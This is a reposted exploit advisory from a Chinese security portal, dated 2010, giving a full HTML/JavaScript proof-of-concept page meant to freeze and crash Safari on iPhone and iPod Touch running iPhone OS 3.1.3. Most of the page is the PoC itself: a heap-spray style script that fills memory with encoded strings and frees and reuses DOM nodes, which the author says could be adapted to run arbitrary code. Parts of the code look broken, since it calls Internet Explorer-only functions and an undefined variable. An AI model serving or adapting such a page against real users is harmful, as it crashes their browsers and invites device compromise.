首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Remote DoS on Safari for iPhone & iPod Touch
来源:http://nishantdaspatnaik.yolasite.com/research.php 作者:Patnaik 发布时间:2010-03-29  

# Exploit Title: Remote DoS on Safari for iPhone & iPod Touch

# Date: 26/03/2010

# Author: Nishant Das Patnaik
# For more of Nishant's research, please visit:
# http://nishantdaspatnaik.yolasite.com/research.php

# Tested on: iPod Touch 3G (iPhone OS 3.1.3)

# Description: An attacker may direct the user to visit a specially crafted webpage that can lead the Safari browser on iPhone & iPod Touch running iPhone OS 3.1.3 to freeze and finally crash. The attacker can modify to the PoC to run arbitrary code on the device.
 
# Code:

---------PoC STARTS HERE----------------

<html>
<title> Remote DoS on Safari for iPhone & iPod Touch </title>
<body>
<script language="JavaScript">
var size="%u03e8";
var matrix = new Array();
var slope = 0x100000-(size.length*2+0x01020);
var bomb = unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000");
while(bomb.length<slope/2) { bomb+=bomb;}
var lh = bomb.substring(0,slope/2);
delete bomb;
for(i=0; i<0xC0; i++) {
matrix[i] = lh + size;
}
CollectGarbage();
var slope1=unescape("%u0b0b%u0b0b%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000AAAAAAAAAAAAAAAAAAAAAAAAA");
var matrix1 = new Array();
for(var x=0;x<1000;x++) matrix1.push(document.createElement("img"));
function ready() {
out1=document.createElement("tbody");
out1.click;
var out2 = out1.cloneNode();
out11.clearAttributes();
out1=null; CollectGarbage();
for(var x=0;x<matrix1.length;x++) matrix1[x].src=slope1;
out2.click;
}
</script>
<script>window.setTimeout("ready();",800);</script>
<center>
<h1> Remote DoS on Safari for iPhone & iPod Touch </h1>
<h2> (C) Nishant Das Patnaik </h2>
</center>
</body>
</html>

---------POC ENDS HERE----------------


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Bad "VML" Remote DoS on Safari
·tPop3d 1.5.3 DoS
·SAP MaxDB Malformed Handshake
·Mini-stream RM-MP3 Converter V
·Lexmark Multiple Laser printer
·JITed egg-hunter stage-0 shell
·SAP GUI version 7.00 BExGlobal
·Mini-stream Ripper 3.1.0.8 =>
·Cisco TFTP Server 1.1 DoS
·Stud_PE <= v2.6.05 Stack Overf
·eDisplay Personal FTP server 1
·ASX to MP3 Converter Version 3
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved